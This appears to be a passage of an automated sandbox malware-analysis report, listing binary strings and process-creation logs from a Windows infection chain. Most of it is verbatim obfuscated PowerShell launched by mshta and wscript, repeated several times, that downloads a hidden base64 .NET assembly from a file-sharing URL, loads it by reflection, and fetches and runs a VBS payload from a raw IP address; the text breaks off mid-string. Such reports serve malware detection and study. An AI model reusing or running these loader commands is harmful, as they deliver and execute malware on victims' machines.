bdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinked
                Source: Binary string: aspnet_compiler.pdb source: djvbaae, 0000000F.00000000.2357331428.0000000000192000.00000002.00000001.01000000.0000000C.sdmp, djvbaae.14.dr
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105130224.00000000049D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2163834487.000000000709A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.pdb source: powershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUa